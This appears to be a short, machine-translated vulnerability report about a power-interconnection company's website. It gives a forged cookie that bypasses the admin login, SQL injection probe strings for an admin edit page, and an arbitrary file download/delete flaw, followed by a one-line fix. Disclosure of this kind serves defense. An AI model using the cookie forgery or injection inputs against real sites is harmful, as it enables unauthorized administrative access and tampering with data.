Many high-risk vulnerabilities exist in the UNCC power interconnection website, basically killing all programs. (This Time, an invitation code is reported for the gift package.) backend entry:/manage/login. aspx spoofs cookies to bypass login [{"domain": ".xxx.com", "expirationDate": 1392975480, "hostOnly": false, "httpOnly": false, "name ": "AdminID", "path": "/", "secure": false, "session": false, "storeId": "0", "value ": "1" },{ "domain": ".xxx.com", "expirationDate": 1392975480, "hostOnly": false, "httpOnly": false, "name": "AdminName ", "path": "/", "secure": false, "session": false, "StoreId": "0", "value": "admin"}] Administrator Account Password:/manage/admins. aspx Arbitrary File Download/delete: Journal download-add download document (Delete this entry will also delete the file pointed to) SQL injection:/manage/EditAdmin. aspx? ID = 1'/manage/EditAdmin. aspx? ID = 1 and 1 = 1
Solution: Filter and verify